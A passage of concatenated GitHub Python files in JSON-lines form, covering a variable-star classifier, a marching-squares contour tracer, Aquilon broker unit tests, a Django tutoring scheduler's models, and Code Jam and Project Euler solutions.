'''\n Retrieves the data stored as pickle files.\n \n Params:\n - x_data_file: the pickle file containing the extracted features\n - y_data_file: the pickle file containing the labels\n '''\n x_data_raw = np.array(pd.read_pickle(x_data_file))\n with open('y_data_file', 'rb') as f:\n y_data_raw = np.array(pickle.load(f))\n \n return x_data_raw, y_data_raw\n\ndef preprocess(x_data, y_data, split=0.2, one_hot=True):\n '''\n Preprocesses the data by generating onehot encodings for the labels,\n splitting them into train/dev/test sets, and normalizing feature-wise.\n \n Params:\n - x_data: the feature-extracted data\n - y_data: the onehot-encoded labels\n - split: the fraction to split the data into (defaults to 60/20/20)\n \n Returns:\n - Tuples for the train/validation/test set.\n '''\n # Onehot encoding\n label_encoder = LabelEncoder()\n y_data = label_encoder.fit_transform(y_data)\n \n if (one_hot):\n onehot_encoder = OneHotEncoder(sparse=False)\n integer_encoded = y_data.reshape(len(integer_encoded), 1)\n y_data = onehot_encoder.fit_transform(integer_encoded)\n\n # Split into train/dev/test sets\n x_train, x_test, y_train, y_test = train_test_split(x_data, y_data, test_size=split, random_state=0)\n x_train, x_val, y_train, y_val = train_test_split(x_data, y_data, test_size=(split / (1-split)), random_state=0)\n \n # Normalize feature-wise\n scaler = StandardScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n x_val = scaler.transform(x_val)\n \n return (x_train, y_train), (x_val, y_val), (x_test, y_test)\n\ndef softmax_classifier(train_data, test_data):\n '''\n Performs softmax classification on the training data and generates\n predictions on the testing data.\n \n Params:\n - train_data: tuple of the normalized feature-extracted data and onehot encoded labels (for training)\n - test_data: tuple of the normalized feature-extrated data and onhot encoded labels (for testing)\n \n Returns:\n - testing accuracy and predictions on the test set\n '''\n clf = sklearn.linear_model.LogisticRegression(class_weight='balanced', multi_class='multinomial', \n solver='lbfgs', max_iter=10000)\n \n x_train, y_train = train_data\n x_test, y_test = test_data\n clf.fit(x_train, np.ravel(y_train, order='C'))\n \n sm_score = clf.score(x_test, y_test)\n predictions = clf.predict(x_test)\n return sm_score, predictions\n\ndef baseline_neural_network_model(num_features):\n '''\n Defines a 4 layer fully connected neural network.\n \n Params:\n - num_features: the number of features extracted from tsfresh in the data\n \n Returns:\n - Keras model object.\n '''\n X_input = layers.Input(num_features,)\n X = layers.Dense(128, activation='relu', kernel_regularizer = regularizers.l2(0.01))(X_input)\n X = layers.Dense(64, activation='relu')(X)\n X = layers.Dense(32, activation='relu')(X)\n X = layers.Dense(4, activation='softmax')(X)\n model = models.Model(inputs = X_input, outputs=X, name='baseline')\n return model\n\ndef fit_nn(train_data, val_data, test_data, epochs=15, batch_size=64):\n '''\n Compiles the model defined above and traings the model on the training data.\n Produces predictions on the testing data.\n \n Params:\n - train_data: tuple of the x and y data for the training set\n - val_data: tuple of the x and y data for the dev set\n - test_data: tuple of the x and y data for the test set\n \n Returns:\n - loss, accuracy, and predictions on the testing set\n '''\n x_train, y_train = train_data\n x_val, y_val = val_data\n x_test, y_test = test_data\n \n model = baseline_neural_network_model(x_train.shape[1])\n model.compile(optimizer = optimizers.Adam(learning_rate=0.001), \n loss = 'categorical_crossentropy', metrics = ['accuracy'])\n \n model.fit(x_train, y_train, validation_data = (x_val, y_val),\n epochs = epochs, batch_size=batch_size, shuffle=True)\n \n loss, acc = model.evaluate(x_test, y_test)\n predictions = model.predict(x_test)\n return loss, acc, predictions\n\nif __name__ == '__main__':\n # Load raw data (post feature extraction with tsfresh)\n extracted_features_file = '../data/feature_extraction/extracted_features_200'\n y_labels = '../data/data_labels'\n x_data_raw, y_data_raw = load_raw_data(extracted_features_file, y_labels)\n \n # Preprocess to normalize and split (softmax)\n train_data_sm, _, test_data_sm = preprocess(x_data_raw, y_data_raw, one_hot=False)\n \n # Train and predict with softmax classifier\n sm_acc, sm_predictions = softmax_classifier(train_data_sm, test_data_sm)\n \n # Compute precision/recall/confusion matrix\n labels = ['eb', 'irreg', 'mira', 'rr']\n print('Softmax Classifier:')\n precision_sm, recall_sm, f1_sm = get_metrics(test_data_sm[1], sm_predictions, onehot_encoded=False)\n print('Precisions: ' + str(precision))\n print('Recall: ' + str(recall))\n print('Average F1 Score: ' + str(f1_sm))\n plot_confusion_matrix(test_data_sm[1], sm_predictions, labels, 'Softmax CM', onehot_encoded=False)\n \n # Preprocess to normalize and split (nn)\n train_data_nn, val_data_nn, test_data_nn = preprocess(x_data_raw, y_data_raw)\n \n # Train and predict with nn\n nn_loss, nn_acc, nn_predictions = fit_nn(train_data_nn, val_data_nn, test_data_nn)\n \n # Compute precision/recall/confusion matrix\n print('Fully Connected Neural Network:')\n precision_nn, recall_nn, f1_nn = get_metrics(test_data_nn[1], nn_predictions)\n print('Precisions: ' + str(precision))\n print('Recall: ' + str(recall))\n print('Average F1 Score: ' + str(f1_nn))\n plot_confusion_matrix(test_data_nn[1], nn_predictions, labels, 'FC Neural Network CM')\n","repo_name":"TirthDS/Variable_Star_Classification","sub_path":"Models/feature_extracted_models.py","file_name":"feature_extracted_models.py","file_ext":"py","file_size_in_byte":6581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9161950601","text":"#! /usr/bin/env python\n\"\"\"\nProvie a class which performs the marching squares algorithm on an image.\nThe desired output is a set of regions / contours.\n\"\"\"\n\nfrom copy import copy\nimport numpy as np\n\n__author__ = \"Paul Hancock\"\n\n\nclass MarchingSquares():\n \"\"\"\n Implementation of a marching squares algorithm. With reference to\n http://devblog.phillipspiess.com/2010/02/23/better-know-an-algorithm-1-marching-squares/\n but written in python\n \"\"\"\n\n NOWHERE = 0b0000\n UP = 0b0001\n DOWN = 0b0010\n LEFT = 0b0100\n RIGHT = 0b1000\n\n def __init__(self, data):\n self.prev = self.NOWHERE\n self.next = self.NOWHERE\n self.data = np.nan_to_num(data) # set all the nan values to be zero\n self.xsize, self.ysize = data.shape\n self.perimeter = self.do_march()\n return\n\n def find_start_point(self):\n \"\"\"\n Find the first location in our array that is not empty\n \"\"\"\n for i, row in enumerate(self.data):\n for j, _ in enumerate(row):\n if self.data[i, j] != 0: # or not np.isfinite(self.data[i,j]):\n return i, j\n\n def step(self, x, y):\n \"\"\"\n Move from the current location to the next\n\n Parameters\n ----------\n x, y : int\n The current location\n \"\"\"\n up_left = self.solid(x - 1, y - 1)\n up_right = self.solid(x, y - 1)\n down_left = self.solid(x - 1, y)\n down_right = self.solid(x, y)\n\n state = 0\n self.prev = self.next\n # which cells are filled?\n if up_left:\n state |= 1\n if up_right:\n state |= 2\n if down_left:\n state |= 4\n if down_right:\n state |= 8\n\n # what is the next step?\n if state in [1, 5, 13]:\n self.next = self.UP\n elif state in [2, 3, 7]:\n self.next = self.RIGHT\n elif state in [4, 12, 14]:\n self.next = self.LEFT\n elif state in [8, 10, 11]:\n self.next = self.DOWN\n elif state == 6:\n if self.prev == self.UP:\n self.next = self.LEFT\n else:\n self.next = self.RIGHT\n elif state == 9:\n if self.prev == self.RIGHT:\n self.next = self.UP\n else:\n self.next = self.DOWN\n else:\n self.next = self.NOWHERE\n return\n\n def solid(self, x, y):\n \"\"\"\n Determine whether the pixel x,y is nonzero\n\n Parameters\n ----------\n x, y : int\n The pixel of interest.\n\n Returns\n -------\n solid : bool\n True if the pixel is not zero.\n \"\"\"\n if not(0 <= x < self.xsize) or not(0 <= y < self.ysize):\n return False\n if self.data[x, y] == 0:\n return False\n return True\n\n def walk_perimeter(self, startx, starty):\n \"\"\"\n Starting at a point on the perimeter of a region, 'walk' the perimeter\n to return to the starting point. Record the path taken.\n\n Parameters\n ----------\n startx, starty : int\n The starting location. Assumed to be on the perimeter of a region.\n\n Returns\n -------\n perimeter : list\n A list of pixel coordinates [ [x1,y1], ...] that constitute the\n perimeter of the region.\n \"\"\"\n # checks\n startx = max(startx, 0)\n startx = min(startx, self.xsize)\n starty = max(starty, 0)\n starty = min(starty, self.ysize)\n\n points = []\n\n x, y = startx, starty\n\n while True:\n self.step(x, y)\n if 0 <= x <= self.xsize and 0 <= y <= self.ysize:\n points.append((x, y))\n if self.next == self.UP:\n y -= 1\n elif self.next == self.LEFT:\n x -= 1\n elif self.next == self.DOWN:\n y += 1\n elif self.next == self.RIGHT:\n x += 1\n # stop if we meet some kind of error\n elif self.next == self.NOWHERE:\n break\n # stop when we return to the starting location\n if x == startx and y == starty:\n break\n return points\n\n def do_march(self):\n \"\"\"\n March about and trace the outline of our object\n\n Returns\n -------\n perimeter : list\n The pixels on the perimeter of the region [[x1, y1], ...]\n \"\"\"\n x, y = self.find_start_point()\n perimeter = self.walk_perimeter(x, y)\n return perimeter\n\n def _blank_within(self, perimeter):\n \"\"\"\n Blank all the pixels within the given perimeter.\n\n Parameters\n ----------\n perimeter : list\n The perimeter of the region.\n\n \"\"\"\n # Method:\n # scan around the perimeter filling 'up' from each pixel\n # stopping when we reach the other boundary\n for p in perimeter:\n # if we are on the edge of the data then there is nothing to fill\n if p[0] >= self.data.shape[0] or p[1] >= self.data.shape[1]:\n continue\n # if this pixel is blank then don't fill\n if self.data[p] == 0:\n continue\n\n # blank this pixel\n self.data[p] = 0\n\n # blank until we reach the other perimeter\n for i in range(p[1]+1, self.data.shape[1]):\n q = p[0], i\n # stop when we reach another part of the perimeter\n if q in perimeter:\n break\n # fill everything in between, even inclusions\n self.data[q] = 0\n\n return\n\n def do_march_all(self):\n \"\"\"\n Recursive march in the case that we have a fragmented shape.\n\n Returns\n -------\n perimeters : [perimeter1, ...]\n The perimeters of all the regions in the image.\n\n See Also\n --------\n :func:`AegeanTools.msq2.MarchingSquares.do_march`\n \"\"\"\n # copy the data since we are going to be modifying it\n data_copy = copy(self.data)\n\n # iterate through finding an island, creating a perimeter,\n # and then blanking the island\n perimeters = []\n p = self.find_start_point()\n while p is not None:\n x, y = p\n perim = self.walk_perimeter(x, y)\n perimeters.append(perim)\n self._blank_within(perim)\n p = self.find_start_point()\n\n # restore the data\n self.data = data_copy\n return perimeters\n","repo_name":"PaulHancock/Aegean","sub_path":"AegeanTools/msq2.py","file_name":"msq2.py","file_ext":"py","file_size_in_byte":6682,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"61"} +{"seq_id":"32273728506","text":"import unittest\n\nif __name__ == \"__main__\":\n import utils\n utils.import_depends()\n\nfrom brokertest import TestBrokerCommand\n\nSRV_MSG = \"WARNING: Server %s, is the last server bound to Service %s which still has clients\"\nSRVINST_MSG = \"WARNING: Server %s, is the last server bound to Service %s, instance %s which still has clients\"\n\n\nclass TestUnbindServer(TestBrokerCommand):\n\n def testcheckinitialplenary(self):\n # This test must use the same regular expressions as\n # testverifycatunittest02() does, to verify that the success of\n # searchclean() is not due to errors in the expressions\n command = [\"cat\", \"--hostname\", \"unittest02.one-nyp.ms.com\"]\n out = self.commandtest(command)\n self.searchoutput(out, r'/utsvc/[^/]+/server', command)\n self.searchoutput(out, r'/dns/[^/]+/server', command)\n\n def testunbindutsi1unittest02(self):\n command = [\"unbind\", \"server\",\n \"--hostname\", \"unittest02.one-nyp.ms.com\",\n \"--service\", \"utsvc\", \"--all\"]\n\n (out, err) = self.successtest(command)\n self.assertEmptyOut(out, command)\n\n self.matchoutput(err,\n SRV_MSG % (\"unittest02.one-nyp.ms.com\", \"utsvc\"),\n command)\n\n def testunbinddns(self):\n self.noouttest([\"unbind\", \"server\",\n \"--hostname\", \"unittest02.one-nyp.ms.com\",\n \"--service\", \"dns\", \"--all\"])\n command = [\"unbind\", \"server\",\n \"--hostname\", \"nyaqd1.ms.com\",\n \"--service\", \"dns\", \"--all\"]\n\n (out, err) = self.successtest(command)\n self.assertEmptyOut(out, command)\n\n self.matchoutput(err,\n SRV_MSG % (\"nyaqd1.ms.com\", \"dns\"),\n command)\n\n # Should have already been unbound...\n # Hmm... this (as implemented) actually returns 0. Kind of a pointless\n # test case, at least for now.\n #def testrejectunbindutsi1unittest00(self):\n # self.badrequesttest([\"unbind\", \"server\",\n # \"--hostname\", \"unittest00.one-nyp.ms.com\",\n # \"--service\", \"utsvc\", \"--instance\", \"utsi1\"])\n\n def testverifycatutsi1(self):\n command = \"cat --service utsvc --instance utsi1\"\n out = self.commandtest(command.split(\" \"))\n self.matchoutput(out,\n \"structure template servicedata/utsvc/utsi1/config;\",\n command)\n self.matchoutput(out, 'include { \"servicedata/utsvc/config\" };',\n command)\n self.matchoutput(out, '\"instance\" = \"utsi1\";', command)\n self.searchoutput(out, r'\"servers\" = list\\(\\s*\\);', command)\n\n def testverifycatunittest02(self):\n command = [\"cat\", \"--hostname\", \"unittest02.one-nyp.ms.com\"]\n out = self.commandtest(command)\n self.searchclean(out, r'/utsvc/[^/]+/server', command)\n self.searchclean(out, r'/dns/[^/]+/server', command)\n\n def testverifybindutsi1(self):\n command = \"show service --service utsvc --instance utsi1\"\n out = self.commandtest(command.split(\" \"))\n self.matchclean(out, \"Server: unittest02.one-nyp.ms.com\", command)\n self.matchclean(out, \"Server: unittest00.one-nyp.ms.com\", command)\n\n def testunbindutsi2unittest00(self):\n command = [\"unbind\", \"server\",\n \"--hostname\", \"unittest00.one-nyp.ms.com\",\n \"--service\", \"utsvc\", \"--instance\", \"utsi2\"]\n\n (out, err) = self.successtest(command)\n self.assertEmptyOut(out, command)\n\n self.matchoutput(err,\n SRVINST_MSG % (\"unittest00.one-nyp.ms.com\", \"utsvc\", \"utsi2\"),\n command)\n\n def testverifycatutsi2(self):\n command = \"cat --service utsvc --instance utsi2\"\n out = self.commandtest(command.split(\" \"))\n self.matchoutput(out,\n \"structure template servicedata/utsvc/utsi2/config;\",\n command)\n self.matchoutput(out, 'include { \"servicedata/utsvc/config\" };',\n command)\n self.matchoutput(out, '\"instance\" = \"utsi2\";', command)\n self.searchoutput(out, r'\"servers\" = list\\(\\s*\\);', command)\n\n def testverifybindutsi2(self):\n command = \"show service --service utsvc --instance utsi2\"\n out = self.commandtest(command.split(\" \"))\n self.matchclean(out, \"Server: unittest02.one-nyp.ms.com\", command)\n self.matchclean(out, \"Server: unittest00.one-nyp.ms.com\", command)\n\n def testunbindntp(self):\n command = [\"unbind\", \"server\",\n \"--hostname\", \"nyaqd1.ms.com\", \"--service\", \"ntp\", \"--all\"]\n\n (out, err) = self.successtest(command)\n self.assertEmptyOut(out, command)\n\n self.matchoutput(err,\n SRV_MSG % (\"nyaqd1.ms.com\", \"ntp\"),\n command)\n\n def testverifyunbindntp(self):\n command = \"show service --service ntp\"\n out = self.commandtest(command.split(\" \"))\n self.matchclean(out, \"Server: nyaqd1.ms.com\", command)\n\n def testunbindaqd(self):\n command = [\"unbind\", \"server\",\n \"--hostname\", \"nyaqd1.ms.com\", \"--service\", \"aqd\", \"--all\"]\n\n (out, err) = self.successtest(command)\n self.assertEmptyOut(out, command)\n\n self.matchoutput(err,\n SRV_MSG % (\"nyaqd1.ms.com\", \"aqd\"),\n command)\n\n def testverifyunbindaqd(self):\n command = \"show service --service aqd\"\n out = self.commandtest(command.split(\" \"))\n self.matchclean(out, \"Server: nyaqd1.ms.com\", command)\n\n def testunbindlemon(self):\n command = [\"unbind\", \"server\", \"--hostname\", \"nyaqd1.ms.com\",\n \"--service\", \"lemon\", \"--all\"]\n\n (out, err) = self.successtest(command)\n self.assertEmptyOut(out, command)\n\n self.matchoutput(err,\n SRV_MSG % (\"nyaqd1.ms.com\", \"lemon\"),\n command)\n\n def testverifyunbindlemon(self):\n command = \"show service --service lemon\"\n out = self.commandtest(command.split(\" \"))\n self.matchclean(out, \"Server: nyaqd1.ms.com\", command)\n\n def testunbindsyslogng(self):\n command = [\"unbind\", \"server\", \"--hostname\", \"nyaqd1.ms.com\",\n \"--service\", \"syslogng\", \"--all\"]\n\n (out, err) = self.successtest(command)\n self.assertEmptyOut(out, command)\n\n self.matchoutput(err, SRV_MSG % (\"nyaqd1.ms.com\", \"syslogng\"),\n command)\n\n def testverifyunbindsyslogng(self):\n command = \"show service --service syslogng\"\n out = self.commandtest(command.split(\" \"))\n self.matchclean(out, \"Server: nyaqd1.ms.com\", command)\n\n def testunbindbootserver(self):\n command = [\"unbind_server\",\n \"--hostname=server9.aqd-unittest.ms.com\",\n \"--service=bootserver\", \"--all\"]\n\n (out, err) = self.successtest(command)\n self.assertEmptyOut(out, command)\n\n self.matchoutput(err,\n SRV_MSG % (\"server9.aqd-unittest.ms.com\", \"bootserver\"),\n command)\n\n def testverifyunbindbootserver(self):\n command = \"show service --service bootserver\"\n out = self.commandtest(command.split(\" \"))\n self.matchclean(out, \"Server: server9.aqd-unittest.ms.com\", command)\n\n def testunbindchooser(self):\n for service in [\"chooser1\", \"chooser2\", \"chooser3\"]:\n for (s, n) in [(1, 'a'), (2, 'b'), (3, 'c')]:\n if service == 'chooser2' and n == 'b':\n continue\n if service == 'chooser3' and n == 'c':\n continue\n server = \"server%d.aqd-unittest.ms.com\" % s\n instance = \"ut.%s\" % n\n command = [\"unbind\", \"server\", \"--hostname\", server,\n \"--service\", service, \"--instance\", instance]\n (out, err) = self.successtest(command)\n self.assertEmptyOut(out, command)\n\n def testunbindpollhelper(self):\n service = self.config.get(\"broker\", \"poll_helper_service\")\n self.successtest([\"unbind\", \"server\", \"--hostname\", \"nyaqd1.ms.com\",\n \"--service\", service, \"--instance\", \"unittest\"])\n\n\nif __name__ == '__main__':\n suite = unittest.TestLoader().loadTestsFromTestCase(TestUnbindServer)\n unittest.TextTestRunner(verbosity=2).run(suite)\n","repo_name":"gombasg/aquilon","sub_path":"tests/broker/test_unbind_server.py","file_name":"test_unbind_server.py","file_ext":"py","file_size_in_byte":8554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"23467940941","text":"import sys\n\nf = open(sys.argv[1])\nf2 = open('res.text', \"w\")\n\n\n\nfor i in range(int(f.readline().strip())):\n\tN = f.readline()\n\tarr = map(int, f.readline().strip().split(\" \"))\n\tsum_diff = 0\n\tmin_diff = 0\n\tfor index, num in enumerate(arr[1:]):\n\t\tsum_diff -= min(0, num - arr[index])\n\t\tmin_diff = min(min_diff, num - arr[index])\n\tcrate = 0\n\tfor num in arr[:-1]:\n\t\tcrate += min(-min_diff, num)\n\n\tf2.write(\"Case #{n}: {a} {b}\\n\".format(a=sum_diff, b=crate, n=i+1))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_159/515.py","file_name":"515.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14735210958","text":"from __future__ import unicode_literals\n\nfrom django.db import models\nfrom django.utils import timezone\nfrom django.contrib.auth.models import User\n# import oauth2client\nfrom oauth2client.contrib.django_orm import FlowField, CredentialsField\nimport datetime\n\n\n# Create your models here.\nclass Teacher(models.Model):\n\tteacher_id = models.AutoField(primary_key=True)\n\tnickname = models.CharField(max_length=200, unique=True)\n\n\tdef get_availability(self):\n\t\t#should remove .first after setting avial and teacher as onetoone\n\t\tavailability = self.availability_set.all().first()\n\t\treturn availability\n\n\tdef __unicode__(self):\n\t\treturn self.nickname\n\n\tdef get_skills(self):\n\t\tskills_list = [self.skill_1, self.skill_2, self.skill_3, self.skill_4, self.skill_5, self.skill_6, self.skill_7, self.skill_8, self.skill_9, self.skill_10, self.skill_11, self.skill_12, self.skill_13, self.skill_14, self.skill_15]\n\t\treturn skills_list\n\n\nclass Student(models.Model):\n\t##necessary for creation\n\tstudent_id = models.AutoField(primary_key=True)\n\tstudent_name = models.CharField(max_length=200, unique=True)\n\n\t#student's preferred teachers\n\tpreferred_teacher1 = models.ForeignKey(Teacher, on_delete=models.CASCADE, related_name='preferred1', blank=True, null=True)\n\tpreferred_teacher2 = models.ForeignKey(Teacher, on_delete=models.CASCADE, related_name='preferred2', blank=True, null=True)\n\tpreferred_teacher3 = models.ForeignKey(Teacher, on_delete=models.CASCADE, related_name='preferred3', blank=True, null=True)\n\n\t#student's rejected teachers\n\trejected_teacher1 = models.ForeignKey(Teacher, on_delete=models.CASCADE, related_name='rejected1', blank=True, null=True)\n\trejected_teacher2 = models.ForeignKey(Teacher, on_delete=models.CASCADE, related_name='rejected2', blank=True, null=True)\n\trejected_teacher3 = models.ForeignKey(Teacher, on_delete=models.CASCADE, related_name='rejected3', blank=True, null=True)\n\n\t#Student's requested dates\n\t# start_date = models.DateField('start date', blank=True)\n\t# start_datetime = models.DateTimeField('start datetime', default=timezone.now)\n\t# end_date = models.DateField('end date', null=True, blank=True)\n\t# scheduled_hours = models.FloatField('scheduled hours', null=True, blank=True)\n\t#Student's schedule: available start, availabe end, max duration\n\n\t#print student nickname\n\tdef __repr__(self):\n\t\treturn '' % (self.student_name)\n\n\tdef __unicode__(self):\n\t\treturn self.student_name\n\n\tdef get_skills(self):\n\t\tskills_list = [self.skill_1, self.skill_2, self.skill_3, self.skill_4, self.skill_5, self.skill_6, self.skill_7, self.skill_8, self.skill_9, self.skill_10, self.skill_11, self.skill_12, self.skill_13, self.skill_14, self.skill_15]\n\t\treturn skills_list\n\nclass Event(models.Model):\n\tevent_id = models.AutoField(primary_key=True)\n\tstart_datetime = models.DateTimeField('Start Date', default=timezone.now)\n\tend_datetime = models.DateTimeField('End Date', default=timezone.now)\n\tduration = models.FloatField(default=0)\n\tteacher = models.ForeignKey(Teacher, on_delete=models.CASCADE, default=-1)\n\tstudent = models.ForeignKey(Student, on_delete=models.CASCADE, default=-1)\n\tnotes = models.CharField(max_length=200)\n\n\n\tdef __repr__(self):\n\t\treturn '' % (self.teacher, self.student, self.start_datetime)\n\n\tdef __unicode__(self):\n\t\treturn 'Teacher: %s, Student: %s, Start: %s' % (self.teacher, self.student, self.start_datetime)\n\n\n\n#skills table. choose either teacher or event for foreign key\nclass Skill(models.Model):\n\t##ACT\n\t#English\n\tskill_1 = models.BooleanField('ACT English', default=False)\n\t#Math\n\tskill_2 = models.BooleanField('ACT Math', default=False)\n\t#Reading\n\tskill_3 = models.BooleanField('ACT Reading', default=False)\n\t#Science\n\tskill_4 = models.BooleanField('ACT Science', default=False)\n\t#Writing\n\tskill_5 = models.BooleanField('ACT Writing', default=False)\n\t##Floor\n\t#ELA\n\tskill_6 = models.BooleanField('Floor ELA', default=False)\n\t#Math\n\tskill_7 = models.BooleanField('Floor Math', default=False)\n\t##Subject Tutoring\n\t#Pre-Calc\n\tskill_8 = models.BooleanField('Pre-Calculus', default=False)\n\t#Calc\n\tskill_9 = models.BooleanField('Calculus', default=False)\n\t#Biology\n\tskill_10 = models.BooleanField('Biology', default=False)\n\t#Chemistry\n\tskill_11 = models.BooleanField('Chemistry', default=False)\n\t#Physics\n\tskill_12 = models.BooleanField('Physics', default=False)\n\t#Earth/Space\n\tskill_13 = models.BooleanField('Earth/Space', default=False)\n\t#History\n\tskill_14 = models.BooleanField('History', default=False)\n\t#Spanish\n\tskill_15 = models.BooleanField('Spanish', default=False)\n\n\tevent = models.ForeignKey(Event, on_delete=models.CASCADE, null=True, blank=True)\n\tteacher = models.ForeignKey(Teacher, on_delete=models.CASCADE, null=True, blank=True)\t\n\n\tdef skillsArray(self):\n\t\tskills = [self.skill_1, self.skill_2, self.skill_3, self.skill_4, self.skill_5, self.skill_6, self.skill_7, self.skill_8, self.skill_9, \n\t\t\tself.skill_10, self.skill_11, self.skill_12, self.skill_13, self.skill_14, self.skill_15]\n\t\treturn skills\n\n\tdef __unicode__(self):\n\t\treturn 'Skills: %s' (self.skillsArray())\n\nclass Availability(models.Model):\n\t#Teacher's schedule: available start, availabe end, max duration(default=end-start)\n\tmonday_start = models.TimeField('monday start', null=True, blank=True)\n\tmonday_end = models.TimeField('monday end', null=True, blank=True)\n\tmonday_duration = models.FloatField(default=0)\n\ttuesday_start = models.TimeField('tuesday start', null=True, blank=True)\n\ttuesday_end = models.TimeField('tuesday end', null=True, blank=True)\n\ttuesday_duration = models.FloatField(default=0)\n\twednesday_start = models.TimeField('wednesday start', null=True, blank=True)\n\twednesday_end = models.TimeField('wednesday end', null=True, blank=True)\n\twednesday_duration = models.FloatField(default=0)\n\tthursday_start = models.TimeField('thursday start', null=True, blank=True)\n\tthursday_end = models.TimeField('thursday end', null=True, blank=True)\n\tthursday_duration = models.FloatField(default=0)\n\tfriday_start = models.TimeField('friday start', null=True, blank=True)\n\tfriday_end = models.TimeField('friday end', null=True, blank=True)\n\tfriday_duration = models.FloatField(default=0)\n\tsaturday_start = models.TimeField('saturday start', null=True, blank=True)\n\tsaturday_end = models.TimeField('saturday end', null=True, blank=True)\n\tsaturday_duration = models.FloatField(default=0)\n\tsunday_start = models.TimeField('sunday start', null=True, blank=True)\n\tsunday_end = models.TimeField('sunday end', null=True, blank=True)\n\tsunday_duration = models.FloatField(default=0)\n\n\tteacher = models.ForeignKey(Teacher, on_delete=models.CASCADE)\n\nclass FlowModel(models.Model):\n\tid = models.OneToOneField(User, primary_key=True)\n\tflow = FlowField()\n\nclass CredentialsModel(models.Model):\n\tid = models.OneToOneField(User, primary_key=True)\n\tcredential = CredentialsField()\n\nclass ClientSecret(models.Model):\n\tSOCIAL_AUTH_GOOGLE_OAUTH2_KEY = models.CharField(max_length=200)\n\tSOCIAL_AUTH_GOOGLE_OAUTH2_SECRET = models.CharField(max_length=50)\n\tSOCIAL_AUTH_GOOGLE_SCOPE1 = models.TextField()\n\tSOCIAL_AUTH_GOOGLE_SCOPE2 = models.TextField()\n\tSOCIAL_AUTH_LOGIN_REDIRECT_URL = models.CharField(max_length=50)\n\tSOCIAL_AUTH_LOGIN_URL = models.CharField(max_length=50)","repo_name":"Zenonquest/schedule","sub_path":"scheduler/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5846095136","text":"\"\"\"\n\nBy replacing the 1st digit of *3, it turns out that six of the nine possible values:\n13, 23, 43, 53, 73, and 83, are all prime.\n\nBy replacing the 3rd and 4th digits of 56**3 with the same digit, this 5-digits number is the first example\nhaving seven primes among the ten generated numbers, yielding the family:\n56003, 56113, 56333, 56443, 56663, 56773, and 56993.\nConsequently 5603, being the first member of this family, is the smallest prime with this property.\n\nFind the smallest N-digits prime which, by replacing K-digits of the number (not necessarily adjacent digits)\nwith the same digit, is part of an L prime value family.\n\nNote1: It is guaranteed that solution does exist.\nNote2: Leading zeros should not be considered.\nNote3: If there are several solutions, choose the \"lexicographically\" smallest one\n(one sequence is considered \"lexicographically\" smaller than another if its first element which does not match\nthe corresponding element in another sequence is smaller)\n\n\"\"\"\nimport functools\nimport itertools\nfrom bisect import bisect_left, bisect_right\n\n\ndef eratosthenes_sieve(n):\n \"\"\"Return primes <= n.\"\"\"\n\n def add_prime(k):\n \"\"\"Add founded prime.\"\"\"\n primes.append(k)\n pos = k + k\n while pos <= n:\n numbers[pos] = 1\n pos += k\n\n numbers = [0] * (n + 1)\n primes = [2]\n for i in range(3, n + 1, 2):\n if not numbers[i]:\n add_prime(i)\n return primes\n\n\ndef is_prime(primes, n):\n \"\"\"Check if number is prime.\"\"\"\n pos = bisect_left(primes, n)\n if pos < len(primes): # n is in primes\n if primes[pos] == n:\n return True\n return False\n\n\ndef gen_patterns(n, k):\n \"\"\"Build patterns for digits(n) and substitutions (*)\"\"\"\n pattern = 'd' * (n - k) + '*' * k\n founded = set()\n patterns = []\n for composition in itertools.permutations(pattern, n):\n if composition not in founded:\n founded.add(composition)\n digits_at = [i for i, ch in enumerate(composition) if ch == '*']\n patterns.append(digits_at)\n return patterns\n\n\ndef find_sequence(candidates, patterns, n, k, l):\n \"\"\"Find reqired primes sequence from candidate list.\"\"\"\n result = [10 ** n - 1] * l\n for candidate in candidates:\n for pattern in patterns:\n digits = [int(ch) for ch in str(candidate)]\n pattern_digits = [digits[index] for index in pattern]\n start_digit = pattern_digits[0]\n if len(set(pattern_digits)) > 1:\n # skip if not the same digits in '*' pattern\n continue\n if 10 - start_digit < l:\n # Skip if digits too high for having l primes\n continue\n primes_founded = [candidate]\n for digit in range(start_digit + 1, 10):\n for index in pattern:\n digits[index] = digit\n next_candidate = functools.reduce(lambda x, y: 10 * x + y, digits)\n if is_prime(candidates, next_candidate):\n primes_founded.append(next_candidate)\n if len(primes_founded) >= l:\n return primes_founded\n return result\n\n\ndef select(primes, n, k):\n \"\"\"Select primes having n digits and k the same digits.\"\"\"\n min_prime = 10 ** (n - 1)\n max_prime = 10 * min_prime\n start_index = bisect_left(primes, min_prime)\n end_index = bisect_right(primes, max_prime)\n if k == 1:\n candidates = primes[start_index:end_index]\n else:\n candidates = []\n for prime in primes[start_index:end_index]:\n if prime < min_prime or prime >= max_prime:\n assert False\n prime_digits = sorted(str(prime))\n unique_digits = set(prime_digits)\n for digit in unique_digits:\n counter = prime_digits.count(digit)\n if counter >= k:\n candidates.append(prime)\n break\n return candidates\n\n\ndef process(n, k, l):\n \"\"\"Find n-digits prime sequence of length l having k the same digits.\"\"\"\n primes = eratosthenes_sieve(10 ** n)\n candidates = select(primes, n, k)\n patterns = gen_patterns(n, k)\n if len(candidates) > 0:\n result = find_sequence(candidates, patterns, n, k, l)\n if result[0] < 10 ** n - 1:\n return result\n return ['Empty!']\n\n\n# for n in range(2, 8):\n# for k in range(1, n + 1):\n# for l in range(1, 9):\n# print(n, k, l)\n# result = process(n, k, l)\n# print(*result[:l])\n# exit()\n\nn, k, l = [int(s) for s in input().split()]\nresult = process(n, k, l)\nprint(*result[:l])\n","repo_name":"mqq-marek/ProjectEuler","sub_path":"ProjectEuler/Problems_051_100/P051_PrimeDigitReplacements.py","file_name":"P051_PrimeDigitReplacements.py","file_ext":"py","file_size_in_byte":4672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39775046371","text":"class 